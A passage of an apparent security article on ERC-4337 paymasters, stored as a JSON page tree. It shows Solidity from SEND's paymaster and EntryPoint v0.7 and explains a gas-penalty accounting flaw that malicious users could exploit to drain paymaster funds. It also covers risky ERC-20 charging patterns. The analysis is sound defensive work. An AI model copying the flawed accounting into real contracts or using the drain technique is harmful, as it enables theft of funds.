",{"type":28,"tag":116,"props":103314,"children":103315},{"style":370},[103316],{"type":33,"value":14359},{"type":28,"tag":116,"props":103318,"children":103319},{"class":245,"line":1389},[103320,103325,103329,103333,103337,103342,103347,103351,103356,103360],{"type":28,"tag":116,"props":103321,"children":103322},{"style":282},[103323],{"type":33,"value":103324},"                _packValidationData",{"type":28,"tag":116,"props":103326,"children":103327},{"style":266},[103328],{"type":33,"value":313},{"type":28,"tag":116,"props":103330,"children":103331},{"style":376},[103332],{"type":33,"value":7847},{"type":28,"tag":116,"props":103334,"children":103335},{"style":266},[103336],{"type":33,"value":825},{"type":28,"tag":116,"props":103338,"children":103339},{"style":339},[103340],{"type":33,"value":103341},"uint48",{"type":28,"tag":116,"props":103343,"children":103344},{"style":266},[103345],{"type":33,"value":103346},"(cachedPriceTimestamp ",{"type":28,"tag":116,"props":103348,"children":103349},{"style":370},[103350],{"type":33,"value":2268},{"type":28,"tag":116,"props":103352,"children":103353},{"style":266},[103354],{"type":33,"value":103355}," tokenPaymasterConfig.priceMaxAge), ",{"type":28,"tag":116,"props":103357,"children":103358},{"style":350},[103359],{"type":33,"value":353},{"type":28,"tag":116,"props":103361,"children":103362},{"style":266},[103363],{"type":33,"value":895},{"type":28,"tag":116,"props":103365,"children":103366},{"class":245,"line":1425},[103367],{"type":28,"tag":116,"props":103368,"children":103369},{"style":266},[103370],{"type":33,"value":1954},{"type":28,"tag":116,"props":103372,"children":103373},{"class":245,"line":1448},[103374],{"type":28,"tag":116,"props":103375,"children":103376},{"style":266},[103377],{"type":33,"value":3025},{"type":28,"tag":116,"props":103379,"children":103380},{"class":245,"line":1456},[103381],{"type":28,"tag":116,"props":103382,"children":103383},{"style":266},[103384],{"type":33,"value":9986},{"type":28,"tag":116,"props":103386,"children":103387},{"class":245,"line":1520},[103388,103392,103397,103401,103406,103410,103414,103418,103422,103426,103430,103435,103439,103443,103448],{"type":28,"tag":116,"props":103389,"children":103390},{"style":376},[103391],{"type":33,"value":89449},{"type":28,"tag":116,"props":103393,"children":103394},{"style":282},[103395],{"type":33,"value":103396}," _postOp",{"type":28,"tag":116,"props":103398,"children":103399},{"style":266},[103400],{"type":33,"value":313},{"type":28,"tag":116,"props":103402,"children":103403},{"style":376},[103404],{"type":33,"value":103405},"PostOpMode",{"type":28,"tag":116,"props":103407,"children":103408},{"style":266},[103409],{"type":33,"value":825},{"type":28,"tag":116,"props":103411,"children":103412},{"style":339},[103413],{"type":33,"value":83446},{"type":28,"tag":116,"props":103415,"children":103416},{"style":376},[103417],{"type":33,"value":102626},{"type":28,"tag":116,"props":103419,"children":103420},{"style":272},[103421],{"type":33,"value":75960},{"type":28,"tag":116,"props":103423,"children":103424},{"style":266},[103425],{"type":33,"value":825},{"type":28,"tag":116,"props":103427,"children":103428},{"style":339},[103429],{"type":33,"value":45793},{"type":28,"tag":116,"props":103431,"children":103432},{"style":272},[103433],{"type":33,"value":103434}," actualGasCost",{"type":28,"tag":116,"props":103436,"children":103437},{"style":266},[103438],{"type":33,"value":825},{"type":28,"tag":116,"props":103440,"children":103441},{"style":339},[103442],{"type":33,"value":45793},{"type":28,"tag":116,"props":103444,"children":103445},{"style":272},[103446],{"type":33,"value":103447}," actualUserOpFeePerGas",{"type":28,"tag":116,"props":103449,"children":103450},{"style":266},[103451],{"type":33,"value":2830},{"type":28,"tag":116,"props":103453,"children":103454},{"class":245,"line":1580},[103455],{"type":28,"tag":116,"props":103456,"children":103457},{"style":376},[103458],{"type":33,"value":102665},{"type":28,"tag":116,"props":103460,"children":103461},{"class":245,"line":1620},[103462],{"type":28,"tag":116,"props":103463,"children":103464},{"style":376},[103465],{"type":33,"value":102673},{"type":28,"tag":116,"props":103467,"children":103468},{"class":245,"line":1668},[103469],{"type":28,"tag":116,"props":103470,"children":103471},{"style":266},[103472],{"type":33,"value":28842},{"type":28,"tag":116,"props":103474,"children":103475},{"class":245,"line":1677},[103476,103480],{"type":28,"tag":116,"props":103477,"children":103478},{"style":260},[103479],{"type":33,"value":102730},{"type":28,"tag":116,"props":103481,"children":103482},{"style":266},[103483],{"type":33,"value":1291},{"type":28,"tag":116,"props":103485,"children":103486},{"class":245,"line":1685},[103487,103491,103495,103499],{"type":28,"tag":116,"props":103488,"children":103489},{"style":339},[103490],{"type":33,"value":102742},{"type":28,"tag":116,"props":103492,"children":103493},{"style":266},[103494],{"type":33,"value":102747},{"type":28,"tag":116,"props":103496,"children":103497},{"style":370},[103498],{"type":33,"value":373},{"type":28,"tag":116,"props":103500,"children":103501},{"style":266},[103502],{"type":33,"value":102756},{"type":28,"tag":116,"props":103504,"children":103505},{"class":245,"line":1729},[103506,103510,103514,103518],{"type":28,"tag":116,"props":103507,"children":103508},{"style":339},[103509],{"type":33,"value":102742},{"type":28,"tag":116,"props":103511,"children":103512},{"style":266},[103513],{"type":33,"value":102768},{"type":28,"tag":116,"props":103515,"children":103516},{"style":370},[103517],{"type":33,"value":373},{"type":28,"tag":116,"props":103519,"children":103520},{"style":266},[103521],{"type":33,"value":102777},{"type":28,"tag":116,"props":103523,"children":103524},{"class":245,"line":1764},[103525,103530,103534,103539,103543,103548,103552,103556,103560,103565,103570,103574,103578,103582],{"type":28,"tag":116,"props":103526,"children":103527},{"style":266},[103528],{"type":33,"value":103529},"            (",{"type":28,"tag":116,"props":103531,"children":103532},{"style":339},[103533],{"type":33,"value":45793},{"type":28,"tag":116,"props":103535,"children":103536},{"style":266},[103537],{"type":33,"value":103538}," preCharge, ",{"type":28,"tag":116,"props":103540,"children":103541},{"style":339},[103542],{"type":33,"value":32281},{"type":28,"tag":116,"props":103544,"children":103545},{"style":266},[103546],{"type":33,"value":103547}," userOpSender) ",{"type":28,"tag":116,"props":103549,"children":103550},{"style":370},[103551],{"type":33,"value":373},{"type":28,"tag":116,"props":103553,"children":103554},{"style":376},[103555],{"type":33,"value":103290},{"type":28,"tag":116,"props":103557,"children":103558},{"style":266},[103559],{"type":33,"value":141},{"type":28,"tag":116,"props":103561,"children":103562},{"style":282},[103563],{"type":33,"value":103564},"decode",{"type":28,"tag":116,"props":103566,"children":103567},{"style":266},[103568],{"type":33,"value":103569},"(context, (",{"type":28,"tag":116,"props":103571,"children":103572},{"style":339},[103573],{"type":33,"value":45793},{"type":28,"tag":116,"props":103575,"children":103576},{"style":266},[103577],{"type":33,"value":825},{"type":28,"tag":116,"props":103579,"children":103580},{"style":339},[103581],{"type":33,"value":32281},{"type":28,"tag":116,"props":103583,"children":103584},{"style":266},[103585],{"type":33,"value":1929},{"type":28,"tag":116,"props":103587,"children":103588},{"class":245,"line":1896},[103589,103594,103599,103604],{"type":28,"tag":116,"props":103590,"children":103591},{"style":266},[103592],{"type":33,"value":103593},"            preCharge ",{"type":28,"tag":116,"props":103595,"children":103596},{"style":370},[103597],{"type":33,"value":103598},"-=",{"type":28,"tag":116,"props":103600,"children":103601},{"style":266},[103602],{"type":33,"value":103603}," baseFee; ",{"type":28,"tag":116,"props":103605,"children":103606},{"style":250},[103607],{"type":33,"value":103608},"// don't refund the base fee\n",{"type":28,"tag":116,"props":103610,"children":103611},{"class":245,"line":1932},[103612,103616,103621,103625,103630,103634,103638],{"type":28,"tag":116,"props":103613,"children":103614},{"style":339},[103615],{"type":33,"value":102742},{"type":28,"tag":116,"props":103617,"children":103618},{"style":266},[103619],{"type":33,"value":103620}," _cachedPrice ",{"type":28,"tag":116,"props":103622,"children":103623},{"style":370},[103624],{"type":33,"value":373},{"type":28,"tag":116,"props":103626,"children":103627},{"style":282},[103628],{"type":33,"value":103629}," updateCachedPrice",{"type":28,"tag":116,"props":103631,"children":103632},{"style":266},[103633],{"type":33,"value":313},{"type":28,"tag":116,"props":103635,"children":103636},{"style":376},[103637],{"type":33,"value":7847},{"type":28,"tag":116,"props":103639,"children":103640},{"style":266},[103641],{"type":33,"value":895},{"type":28,"tag":116,"props":103643,"children":103644},{"class":245,"line":1940},[103645,103649,103653],{"type":28,"tag":116,"props":103646,"children":103647},{"style":250},[103648],{"type":33,"value":102994},{"type":28,"tag":116,"props":103650,"children":103651},{"style":376},[103652],{"type":33,"value":66379},{"type":28,"tag":116,"props":103654,"children":103655},{"style":250},[103656],{"type":33,"value":103003},{"type":28,"tag":116,"props":103658,"children":103659},{"class":245,"line":1948},[103660,103664,103668,103672,103676,103680,103684,103688],{"type":28,"tag":116,"props":103661,"children":103662},{"style":339},[103663],{"type":33,"value":102742},{"type":28,"tag":116,"props":103665,"children":103666},{"style":266},[103667],{"type":33,"value":103015},{"type":28,"tag":116,"props":103669,"children":103670},{"style":370},[103671],{"type":33,"value":373},{"type":28,"tag":116,"props":103673,"children":103674},{"style":266},[103675],{"type":33,"value":103620},{"type":28,"tag":116,"props":103677,"children":103678},{"style":370},[103679],{"type":33,"value":4240},{"type":28,"tag":116,"props":103681,"children":103682},{"style":266},[103683],{"type":33,"value":103033},{"type":28,"tag":116,"props":103685,"children":103686},{"style":370},[103687],{"type":33,"value":4250},{"type":28,"tag":116,"props":103689,"children":103690},{"style":266},[103691],{"type":33,"value":103042},{"type":28,"tag":116,"props":103693,"children":103694},{"class":245,"line":1957},[103695],{"type":28,"tag":116,"props":103696,"children":103697},{"style":250},[103698],{"type":33,"value":103699},"            // Refund tokens based on actual gas cost\n",{"type":28,"tag":116,"props":103701,"children":103702},{"class":245,"line":1970},[103703,103707,103712,103716,103721,103725,103730,103734],{"type":28,"tag":116,"props":103704,"children":103705},{"style":339},[103706],{"type":33,"value":102742},{"type":28,"tag":116,"props":103708,"children":103709},{"style":266},[103710],{"type":33,"value":103711}," actualChargeNative ",{"type":28,"tag":116,"props":103713,"children":103714},{"style":370},[103715],{"type":33,"value":373},{"type":28,"tag":116,"props":103717,"children":103718},{"style":266},[103719],{"type":33,"value":103720}," actualGasCost ",{"type":28,"tag":116,"props":103722,"children":103723},{"style":370},[103724],{"type":33,"value":2268},{"type":28,"tag":116,"props":103726,"children":103727},{"style":266},[103728],{"type":33,"value":103729}," tokenPaymasterConfig.refundPostopCost ",{"type":28,"tag":116,"props":103731,"children":103732},{"style":370},[103733],{"type":33,"value":4240},{"type":28,"tag":116,"props":103735,"children":103736},{"style":266},[103737],{"type":33,"value":103738}," actualUserOpFeePerGas;\n",{"type":28,"tag":116,"props":103740,"children":103741},{"class":245,"line":1987},[103742,103746,103751,103755,103759],{"type":28,"tag":116,"props":103743,"children":103744},{"style":339},[103745],{"type":33,"value":102742},{"type":28,"tag":116,"props":103747,"children":103748},{"style":266},[103749],{"type":33,"value":103750}," actualTokenNeeded ",{"type":28,"tag":116,"props":103752,"children":103753},{"style":370},[103754],{"type":33,"value":373},{"type":28,"tag":116,"props":103756,"children":103757},{"style":282},[103758],{"type":33,"value":103216},{"type":28,"tag":116,"props":103760,"children":103761},{"style":266},[103762],{"type":33,"value":103763},"(actualChargeNative, cachedPriceWithMarkup);\n",{"type":28,"tag":116,"props":103765,"children":103766},{"class":245,"line":2003},[103767,103771,103776,103780],{"type":28,"tag":116,"props":103768,"children":103769},{"style":260},[103770],{"type":33,"value":58419},{"type":28,"tag":116,"props":103772,"children":103773},{"style":266},[103774],{"type":33,"value":103775}," (preCharge ",{"type":28,"tag":116,"props":103777,"children":103778},{"style":370},[103779],{"type":33,"value":645},{"type":28,"tag":116,"props":103781,"children":103782},{"style":266},[103783],{"type":33,"value":103784}," actualTokenNeeded) {\n",{"type":28,"tag":116,"props":103786,"children":103787},{"class":245,"line":31949},[103788],{"type":28,"tag":116,"props":103789,"children":103790},{"style":250},[103791],{"type":33,"value":103792},"                // If initially provided token amount is greater than the actual amount needed, refund the difference\n",{"type":28,"tag":116,"props":103794,"children":103795},{"class":245,"line":80570},[103796,103801,103806,103811,103815],{"type":28,"tag":116,"props":103797,"children":103798},{"style":266},[103799],{"type":33,"value":103800},"                SafeERC20.",{"type":28,"tag":116,"props":103802,"children":103803},{"style":282},[103804],{"type":33,"value":103805},"safeTransfer",{"type":28,"tag":116,"props":103807,"children":103808},{"style":266},[103809],{"type":33,"value":103810},"(token, userOpSender, preCharge ",{"type":28,"tag":116,"props":103812,"children":103813},{"style":370},[103814],{"type":33,"value":3996},{"type":28,"tag":116,"props":103816,"children":103817},{"style":266},[103818],{"type":33,"value":103819}," actualTokenNeeded);\n",{"type":28,"tag":116,"props":103821,"children":103822},{"class":245,"line":80583},[103823,103827,103831,103835,103839,103843],{"type":28,"tag":116,"props":103824,"children":103825},{"style":266},[103826],{"type":33,"value":70213},{"type":28,"tag":116,"props":103828,"children":103829},{"style":260},[103830],{"type":33,"value":2986},{"type":28,"tag":116,"props":103832,"children":103833},{"style":260},[103834],{"type":33,"value":15449},{"type":28,"tag":116,"props":103836,"children":103837},{"style":266},[103838],{"type":33,"value":103775},{"type":28,"tag":116,"props":103840,"children":103841},{"style":370},[103842],{"type":33,"value":514},{"type":28,"tag":116,"props":103844,"children":103845},{"style":266},[103846],{"type":33,"value":103784},{"type":28,"tag":116,"props":103848,"children":103849},{"class":245,"line":80591},[103850],{"type":28,"tag":116,"props":103851,"children":103852},{"style":250},[103853],{"type":33,"value":103854},"                // Attempt to cover Paymaster's gas expenses by withdrawing the 'overdraft' from the client\n",{"type":28,"tag":116,"props":103856,"children":103857},{"class":245,"line":80599},[103858],{"type":28,"tag":116,"props":103859,"children":103860},{"style":250},[103861],{"type":33,"value":103862},"                // If the transfer reverts also revert the 'postOp' to remove the incentive to cheat\n",{"type":28,"tag":116,"props":103864,"children":103865},{"class":245,"line":80607},[103866,103870,103874,103879,103883,103887,103891,103896,103900],{"type":28,"tag":116,"props":103867,"children":103868},{"style":266},[103869],{"type":33,"value":103800},{"type":28,"tag":116,"props":103871,"children":103872},{"style":282},[103873],{"type":33,"value":103251},{"type":28,"tag":116,"props":103875,"children":103876},{"style":266},[103877],{"type":33,"value":103878},"(token, userOpSender, ",{"type":28,"tag":116,"props":103880,"children":103881},{"style":339},[103882],{"type":33,"value":32281},{"type":28,"tag":116,"props":103884,"children":103885},{"style":266},[103886],{"type":33,"value":313},{"type":28,"tag":116,"props":103888,"children":103889},{"style":376},[103890],{"type":33,"value":17355},{"type":28,"tag":116,"props":103892,"children":103893},{"style":266},[103894],{"type":33,"value":103895},"), actualTokenNeeded ",{"type":28,"tag":116,"props":103897,"children":103898},{"style":370},[103899],{"type":33,"value":3996},{"type":28,"tag":116,"props":103901,"children":103902},{"style":266},[103903],{"type":33,"value":103904}," preCharge);\n",{"type":28,"tag":116,"props":103906,"children":103907},{"class":245,"line":80647},[103908],{"type":28,"tag":116,"props":103909,"children":103910},{"style":266},[103911],{"type":33,"value":58503},{"type":28,"tag":116,"props":103913,"children":103914},{"class":245,"line":80655},[103915],{"type":28,"tag":116,"props":103916,"children":103917},{"emptyLinePlaceholder":19},[103918],{"type":33,"value":1044},{"type":28,"tag":116,"props":103920,"children":103921},{"class":245,"line":87841},[103922,103926,103931,103935,103939],{"type":28,"tag":116,"props":103923,"children":103924},{"style":260},[103925],{"type":33,"value":58419},{"type":28,"tag":116,"props":103927,"children":103928},{"style":266},[103929],{"type":33,"value":103930}," (baseFee ",{"type":28,"tag":116,"props":103932,"children":103933},{"style":370},[103934],{"type":33,"value":645},{"type":28,"tag":116,"props":103936,"children":103937},{"style":350},[103938],{"type":33,"value":2718},{"type":28,"tag":116,"props":103940,"children":103941},{"style":266},[103942],{"type":33,"value":844},{"type":28,"tag":116,"props":103944,"children":103945},{"class":245,"line":87849},[103946,103950,103954],{"type":28,"tag":116,"props":103947,"children":103948},{"style":266},[103949],{"type":33,"value":103800},{"type":28,"tag":116,"props":103951,"children":103952},{"style":282},[103953],{"type":33,"value":103805},{"type":28,"tag":116,"props":103955,"children":103956},{"style":266},[103957],{"type":33,"value":103958},"(token, tokenPaymasterConfig.rewardsPool, baseFee);\n",{"type":28,"tag":116,"props":103960,"children":103961},{"class":245,"line":101191},[103962],{"type":28,"tag":116,"props":103963,"children":103964},{"style":266},[103965],{"type":33,"value":58503},{"type":28,"tag":116,"props":103967,"children":103968},{"class":245,"line":101199},[103969],{"type":28,"tag":116,"props":103970,"children":103971},{"emptyLinePlaceholder":19},[103972],{"type":33,"value":1044},{"type":28,"tag":116,"props":103974,"children":103975},{"class":245,"line":101207},[103976,103981,103986],{"type":28,"tag":116,"props":103977,"children":103978},{"style":260},[103979],{"type":33,"value":103980},"            emit",{"type":28,"tag":116,"props":103982,"children":103983},{"style":282},[103984],{"type":33,"value":103985}," UserOperationSponsored",{"type":28,"tag":116,"props":103987,"children":103988},{"style":266},[103989],{"type":33,"value":103990},"(userOpSender, actualTokenNeeded, actualGasCost, cachedPriceWithMarkup, baseFee);\n",{"type":28,"tag":116,"props":103992,"children":103993},{"class":245,"line":101215},[103994,103999],{"type":28,"tag":116,"props":103995,"children":103996},{"style":282},[103997],{"type":33,"value":103998},"            refillEntryPointDeposit",{"type":28,"tag":116,"props":104000,"children":104001},{"style":266},[104002],{"type":33,"value":104003},"(_cachedPrice);\n",{"type":28,"tag":116,"props":104005,"children":104006},{"class":245,"line":101243},[104007],{"type":28,"tag":116,"props":104008,"children":104009},{"style":266},[104010],{"type":33,"value":1954},{"type":28,"tag":116,"props":104012,"children":104014},{"class":245,"line":104013},67,[104015],{"type":28,"tag":116,"props":104016,"children":104017},{"style":266},[104018],{"type":33,"value":3025},{"type":28,"tag":116,"props":104020,"children":104022},{"class":245,"line":104021},68,[104023],{"type":28,"tag":116,"props":104024,"children":104025},{"style":266},[104026],{"type":33,"value":406},{"type":28,"tag":29,"props":104028,"children":104029},{},[104030,104032,104038,104040,104045,104047,104053],{"type":33,"value":104031},"Looking at the code above, during ",{"type":28,"tag":98,"props":104033,"children":104035},{"className":104034},[],[104036],{"type":33,"value":104037},"validatePaymasterUserOp",{"type":33,"value":104039},", the paymaster attempts to charge a maximum prefund amount first. This prefund is calculated by taking the gas limit specified in the ",{"type":28,"tag":98,"props":104041,"children":104043},{"className":104042},[],[104044],{"type":33,"value":102097},{"type":33,"value":104046}," and applying a markup price to convert the native ETH cost into the equivalent ERC20-token value. Later in ",{"type":28,"tag":98,"props":104048,"children":104050},{"className":104049},[],[104051],{"type":33,"value":104052},"postOp",{"type":33,"value":104054},", the paymaster calculates the actual charge and refunds any excess from the prefund.",{"type":28,"tag":29,"props":104056,"children":104057},{},[104058,104060,104065,104067,104074],{"type":33,"value":104059},"However, there is a critical oversight: ",{"type":28,"tag":4995,"props":104061,"children":104062},{},[104063],{"type":33,"value":104064},"the code does not account for gas penalties",{"type":33,"value":104066},". The actual gas charged to the paymaster includes not just the gas used, but also any ",{"type":28,"tag":87,"props":104068,"children":104071},{"href":104069,"rel":104070},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.7/contracts/core/EntryPoint.sol#L726-L730",[91],[104072],{"type":33,"value":104073},"penalties incurred",{"type":33,"value":104075}," from differences between the execution gas limit and actual execution gas.",{"type":28,"tag":29,"props":104077,"children":104078},{},[104079],{"type":33,"value":104080},"This vulnerability can be exploited by malicious users who set an artificially high gas limit to trigger the penalty. When penalties are applied, the paymaster will be charged significantly more than expected, potentially draining its funds since these additional costs were not factored into the calculation.",{"type":28,"tag":29,"props":104082,"children":104083},{},[104084,104086,104091],{"type":33,"value":104085},"In fact, the bundler will be the one who receives the penalty paid by the paymaster. This means a bundler could submit their own ",{"type":28,"tag":98,"props":104087,"children":104089},{"className":104088},[],[104090],{"type":33,"value":101796},{"type":33,"value":104092}," to be executed by themselves and profit if the penalty they can extract from the paymaster exceeds their own gas costs paid to the paymaster. In SEND's case, fortunately, because they operate their own bundler, any penalties incurred flow back to their controlled bundler, creating a closed economic loop that mitigates this particular attack vector.",{"type":28,"tag":63,"props":104094,"children":104096},{"id":104095},"incorrect-erc-20-handling",[104097],{"type":28,"tag":4995,"props":104098,"children":104099},{},[104100],{"type":33,"value":104101},"Incorrect ERC-20 Handling",{"type":28,"tag":29,"props":104103,"children":104104},{},[104105],{"type":33,"value":104106},"To improve user experience, some protocols introduced ERC-20 paymasters that allow users to pay transaction gas fees using ERC-20 tokens instead of native ETH (Just like what SEND did in the above code). The core concept is quite straightforward, the paymaster fronts the ETH gas costs to bundlers, then charges users an equivalent amount in ERC-20 tokens based on current market rates. However, implementing this token-to-ETH conversion and payment flow securely requires careful consideration.",{"type":28,"tag":29,"props":104108,"children":104109},{},[104110,104111,104116,104118,104123],{"type":33,"value":44921},{"type":28,"tag":98,"props":104112,"children":104114},{"className":104113},[],[104115],{"type":33,"value":101877},{"type":33,"value":104117}," flow above, we can see that paymasters have two key interaction points during a ",{"type":28,"tag":98,"props":104119,"children":104121},{"className":104120},[],[104122],{"type":33,"value":101796},{"type":33,"value":104124},"'s lifecycle:",{"type":28,"tag":455,"props":104126,"children":104127},{},[104128,104138],{"type":28,"tag":459,"props":104129,"children":104130},{},[104131,104133],{"type":33,"value":104132},"During validation via ",{"type":28,"tag":98,"props":104134,"children":104136},{"className":104135},[],[104137],{"type":33,"value":101984},{"type":28,"tag":459,"props":104139,"children":104140},{},[104141,104143],{"type":33,"value":104142},"After execution via ",{"type":28,"tag":98,"props":104144,"children":104146},{"className":104145},[],[104147],{"type":33,"value":101995},{"type":28,"tag":29,"props":104149,"children":104150},{},[104151],{"type":33,"value":104152},"This dual-interaction model has led to two predominant patterns for handling ERC-20 payments in paymaster implementations:",{"type":28,"tag":75,"props":104154,"children":104156},{"id":104155},"_1-pre-payment-with-refund-pattern",[104157],{"type":33,"value":104158},"1. Pre-Payment with Refund Pattern",{"type":28,"tag":29,"props":104160,"children":104161},{},[104162,104164,104169,104171,104176,104178,104184,104185,104191,104193,104198,104200,104205,104207,104212],{"type":33,"value":104163},"In this model, the paymaster requires users to pre-pay the maximum possible gas cost in ERC-20 tokens during ",{"type":28,"tag":98,"props":104165,"children":104167},{"className":104166},[],[104168],{"type":33,"value":101984},{"type":33,"value":104170},". After execution completes, ",{"type":28,"tag":98,"props":104172,"children":104174},{"className":104173},[],[104175],{"type":33,"value":101995},{"type":33,"value":104177}," refunds any excess tokens based on actual gas consumed. This is analogous to how regular ETH gas payments work. Several protocols like ",{"type":28,"tag":98,"props":104179,"children":104181},{"className":104180},[],[104182],{"type":33,"value":104183},"SEND",{"type":33,"value":10659},{"type":28,"tag":98,"props":104186,"children":104188},{"className":104187},[],[104189],{"type":33,"value":104190},"Circle",{"type":33,"value":104192}," have implemented this approach. However, this pattern has one key disadvantage: users must first approve the paymaster to spend their ERC20 tokens before submitting any ",{"type":28,"tag":98,"props":104194,"children":104196},{"className":104195},[],[104197],{"type":33,"value":101825},{"type":33,"value":104199},". This additional setup step is required to ensure the paymaster can successfully deduct tokens ",{"type":28,"tag":4995,"props":104201,"children":104202},{},[104203],{"type":33,"value":104204},"before",{"type":33,"value":104206}," execution (specifically during ",{"type":28,"tag":98,"props":104208,"children":104210},{"className":104209},[],[104211],{"type":33,"value":104037},{"type":33,"value":1484},{"type":28,"tag":75,"props":104214,"children":104216},{"id":104215},"_2-post-execution-charging-pattern",[104217],{"type":33,"value":104218},"2. Post-Execution Charging Pattern",{"type":28,"tag":29,"props":104220,"children":104221},{},[104222,104224,104229,104231,104236,104238,104243,104245,104250],{"type":33,"value":104223},"This alternative approach defers token collection until after execution. Instead of charging a prefund during ",{"type":28,"tag":98,"props":104225,"children":104227},{"className":104226},[],[104228],{"type":33,"value":101984},{"type":33,"value":104230},", the actual token payment is calculated and collected in ",{"type":28,"tag":98,"props":104232,"children":104234},{"className":104233},[],[104235],{"type":33,"value":101995},{"type":33,"value":104237}," based on the exact gas consumed. At first glance, this appears to be the most user-friendly pattern since users can bundle their token approval transaction within the same ",{"type":28,"tag":98,"props":104239,"children":104241},{"className":104240},[],[104242],{"type":33,"value":101796},{"type":33,"value":104244},", eliminating the need for a separate pre-approval transaction before submitting the ",{"type":28,"tag":98,"props":104246,"children":104248},{"className":104247},[],[104249],{"type":33,"value":102097},{"type":33,"value":104251},". This means users could interact with the paymaster without any prior setup.",{"type":28,"tag":29,"props":104253,"children":104254},{},[104255,104257,104262,104264,104270,104272,104278,104280,104285],{"type":33,"value":104256},"This approach used to work in ",{"type":28,"tag":98,"props":104258,"children":104260},{"className":104259},[],[104261],{"type":33,"value":101877},{"type":33,"value":104263}," version ",{"type":28,"tag":98,"props":104265,"children":104267},{"className":104266},[],[104268],{"type":33,"value":104269},"v0.6",{"type":33,"value":104271},", but the pattern no longer works in ",{"type":28,"tag":98,"props":104273,"children":104275},{"className":104274},[],[104276],{"type":33,"value":104277},"v0.7",{"type":33,"value":104279},". In fact, using this pattern can lead to loss of funds for the paymaster. Let's take a closer look at how ",{"type":28,"tag":98,"props":104281,"children":104283},{"className":104282},[],[104284],{"type":33,"value":104277},{"type":33,"value":104286}," handles the execution phase:",{"type":28,"tag":234,"props":104288,"children":104290},{"className":4143,"code":104289,"language":4142,"meta":7,"style":7},"    function _executeUserOp(\n        uint256 opIndex,\n        PackedUserOperation calldata userOp,\n        UserOpInfo memory opInfo\n    )\n    internal virtual\n    returns (uint256 collected) {\n    [...]\n        bool success;\n        {\n    [...]\n            if (methodSig == IAccountExecute.executeUserOp.selector) {\n                bytes memory executeUserOp = abi.encodeCall(IAccountExecute.executeUserOp, (userOp, opInfo.userOpHash));\n                innerCall = abi.encodeCall(this.innerHandleOp, (executeUserOp, opInfo, context));\n            } else\n            {\n                innerCall = abi.encodeCall(this.innerHandleOp, (callData, opInfo, context));\n            }\n            assembly (\"memory-safe\") {\n                success := call(gas(), address(), 0, add(innerCall, 0x20), mload(innerCall), 0, 32)\n                collected := mload(0)\n            }\n            _restoreFreePtr(saveFreePtr);\n        }\n        if (!success) {\n    [...]\n            if (innerRevertCode == INNER_OUT_OF_GAS) {\n                // handleOps was called with gas limit too low. abort entire bundle.\n                // can only be caused by bundler (leaving not enough gas for inner call)\n                revert FailedOp(opIndex, \"AA95 out of gas\");\n            } else if (innerRevertCode == INNER_REVERT_LOW_PREFUND) {\n                // innerCall reverted on prefund too low. treat entire prefund as \"gas cost\"\n                uint256 actualGas = preGas - gasleft() + opInfo.preOpGas;\n                uint256 actualGasCost = opInfo.prefund;\n                _emitPrefundTooLow(opInfo);\n                _emitUserOperationEvent(opInfo, false, actualGasCost, actualGas);\n                collected = actualGasCost;\n            } else {\n    [...]\n                collected = _postExecution(\n                    IPaymaster.PostOpMode.postOpReverted,\n                    opInfo,\n                    context,\n                    actualGas\n                );\n            }\n        }\n    }\n",[104291],{"type":28,"tag":98,"props":104292,"children":104293},{"__ignoreMap":7},[104294,104310,104326,104346,104363,104370,104383,104407,104415,104428,104435,104442,104463,104502,104539,104551,104558,104594,104601,104622,104711,104740,104747,104760,104767,104787,104794,104815,104823,104831,104858,104886,104894,104937,104957,104970,104992,105008,105023,105030,105050,105058,105066,105074,105082,105090,105097,105104],{"type":28,"tag":116,"props":104295,"children":104296},{"class":245,"line":246},[104297,104301,104306],{"type":28,"tag":116,"props":104298,"children":104299},{"style":376},[104300],{"type":33,"value":89449},{"type":28,"tag":116,"props":104302,"children":104303},{"style":282},[104304],{"type":33,"value":104305}," _executeUserOp",{"type":28,"tag":116,"props":104307,"children":104308},{"style":266},[104309],{"type":33,"value":3133},{"type":28,"tag":116,"props":104311,"children":104312},{"class":245,"line":256},[104313,104317,104322],{"type":28,"tag":116,"props":104314,"children":104315},{"style":339},[104316],{"type":33,"value":89627},{"type":28,"tag":116,"props":104318,"children":104319},{"style":272},[104320],{"type":33,"value":104321}," opIndex",{"type":28,"tag":116,"props":104323,"children":104324},{"style":266},[104325],{"type":33,"value":3178},{"type":28,"tag":116,"props":104327,"children":104328},{"class":245,"line":293},[104329,104334,104338,104342],{"type":28,"tag":116,"props":104330,"children":104331},{"style":376},[104332],{"type":33,"value":104333},"        PackedUserOperation",{"type":28,"tag":116,"props":104335,"children":104336},{"style":376},[104337],{"type":33,"value":102626},{"type":28,"tag":116,"props":104339,"children":104340},{"style":272},[104341],{"type":33,"value":102631},{"type":28,"tag":116,"props":104343,"children":104344},{"style":266},[104345],{"type":33,"value":3178},{"type":28,"tag":116,"props":104347,"children":104348},{"class":245,"line":361},[104349,104354,104358],{"type":28,"tag":116,"props":104350,"children":104351},{"style":376},[104352],{"type":33,"value":104353},"        UserOpInfo",{"type":28,"tag":116,"props":104355,"children":104356},{"style":376},[104357],{"type":33,"value":102694},{"type":28,"tag":116,"props":104359,"children":104360},{"style":272},[104361],{"type":33,"value":104362}," opInfo\n",{"type":28,"tag":116,"props":104364,"children":104365},{"class":245,"line":387},[104366],{"type":28,"tag":116,"props":104367,"children":104368},{"style":266},[104369],{"type":33,"value":23574},{"type":28,"tag":116,"props":104371,"children":104372},{"class":245,"line":400},[104373,104378],{"type":28,"tag":116,"props":104374,"children":104375},{"style":376},[104376],{"type":33,"value":104377},"    internal",{"type":28,"tag":116,"props":104379,"children":104380},{"style":376},[104381],{"type":33,"value":104382}," virtual\n",{"type":28,"tag":116,"props":104384,"children":104385},{"class":245,"line":614},[104386,104390,104394,104398,104403],{"type":28,"tag":116,"props":104387,"children":104388},{"style":260},[104389],{"type":33,"value":46134},{"type":28,"tag":116,"props":104391,"children":104392},{"style":266},[104393],{"type":33,"value":269},{"type":28,"tag":116,"props":104395,"children":104396},{"style":339},[104397],{"type":33,"value":45793},{"type":28,"tag":116,"props":104399,"children":104400},{"style":272},[104401],{"type":33,"value":104402}," collected",{"type":28,"tag":116,"props":104404,"children":104405},{"style":266},[104406],{"type":33,"value":844},{"type":28,"tag":116,"props":104408,"children":104409},{"class":245,"line":631},[104410],{"type":28,"tag":116,"props":104411,"children":104412},{"style":266},[104413],{"type":33,"value":104414},"    